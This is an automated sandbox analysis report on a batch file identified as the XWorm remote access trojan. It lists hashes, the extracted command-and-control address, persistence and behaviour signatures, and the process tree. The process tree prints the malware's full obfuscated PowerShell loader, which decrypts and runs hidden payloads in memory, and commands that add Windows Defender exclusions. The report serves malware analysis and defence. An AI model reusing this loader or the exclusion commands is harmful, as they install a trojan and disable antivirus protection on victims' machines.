Overview

overview

10

Static

static

1

Skib on sigma.bat

windows11-21h2-x64

Analysis

  • max time kernel
    972s
  • max time network
    989s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-11-2024 17:09

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Skib on sigma.bat

  • Size

    293KB

  • MD5

    23c9458762dbe5435b6db4cc7e54a34b

  • SHA1

    cfcf4d5deb44aebe344b723eeea024d76ef80793

  • SHA256

    2a95e5bad57e737a8a8ef09518d691ca15d29662dcd2a6c5280dafecc9698ac6

  • SHA512

    9184f29327d7da75b31aee6108fc2ab8e4828e5684ac9ad0ecc0aa80fe0e49514f177b513202d5d0269f2c4c44d19dbca5425e4642c3246ffa1a8fe6cc5f77c2

  • SSDEEP

    6144:/xjI8Qgs9ZH+QHefkqFnaXzWHZpIt36OspPqiPIGFY1pz0fcBj89:5jPrsD+QHCkyaXK3dOYP2G2nAUBo9

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

149.40.62.55:60447

Attributes
  • Install_directory

    %AppData%

  • install_file

    System User.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 35 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Skib on sigma.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3376
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WpMEm/GalYp9kcB2+76k+gwrPnoE4VpjTtUPyxQ/61E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IEBYelvRtNxKSaODs/XtpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rGXFD=New-Object System.IO.MemoryStream(,$param_var); $dhbeK=New-Object System.IO.MemoryStream; $YlwRG=New-Object System.IO.Compression.GZipStream($rGXFD, [IO.Compression.CompressionMode]::Decompress); $YlwRG.CopyTo($dhbeK); $YlwRG.Dispose(); $rGXFD.Dispose(); $dhbeK.Dispose(); $dhbeK.ToArray();}function execute_function($param_var,$param2_var){ $kFrOd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HKZZI=$kFrOd.EntryPoint; $HKZZI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Skib on sigma.bat';$LUesu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Skib on sigma.bat').Split([Environment]::NewLine);foreach ($AwCWI in $LUesu) { if ($AwCWI.StartsWith(':: ')) { $mMzbW=$AwCWI.Substring(3); break; }}$payloads_var=[string[]]$mMzbW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4860
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4332
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4532

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    627073ee3ca9676911bee35548eff2b8

    SHA1

    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

    SHA256

    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

    SHA512

    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    aa4f31835d07347297d35862c9045f4a

    SHA1

    83e728008935d30f98e5480fba4fbccf10cefb05

    SHA256

    99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

    SHA512

    ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    c8e142ee24a77ad7f21f6a741d48c8da

    SHA1

    2f174ae49dd03c3b2acd2f9cb2f4e1913908e749

    SHA256

    e81cbecfdbc457b5d8aad1fbd1dc29ab05e6425e9921bff30089f074ddfc6961

    SHA512

    ea1c13f3c559afbdfd63a6ecd2ca354612c3c29c2716156d5afcafe6d3fbd0e7eca7b1f03e68f3a28c78cbea5ec430285fa699facad72fc52a37fca207999799

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    6f0e62045515b66d0a0105abc22dbf19

    SHA1

    894d685122f3f3c9a3457df2f0b12b0e851b394c

    SHA256

    529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319

    SHA512

    f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iyjl2ajn.po4.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/4860-25-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4860-27-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4860-30-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4860-26-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4860-16-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5032-0-0x00007FFB0A763000-0x00007FFB0A765000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5032-15-0x000001752A340000-0x000001752A358000-memory.dmp

    Filesize

    96KB

    Download

  • memory/5032-13-0x000001752A280000-0x000001752A288000-memory.dmp

    Filesize

    32KB

    Download

  • memory/5032-14-0x000001752A2E0000-0x000001752A318000-memory.dmp

    Filesize

    224KB

    Download

  • memory/5032-12-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5032-11-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5032-41-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5032-10-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5032-9-0x000001752A290000-0x000001752A2B2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5032-62-0x00007FFB0A763000-0x00007FFB0A765000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5032-63-0x00007FFB0A760000-0x00007FFB0B222000-memory.dmp

    Filesize

    10.8MB

    Download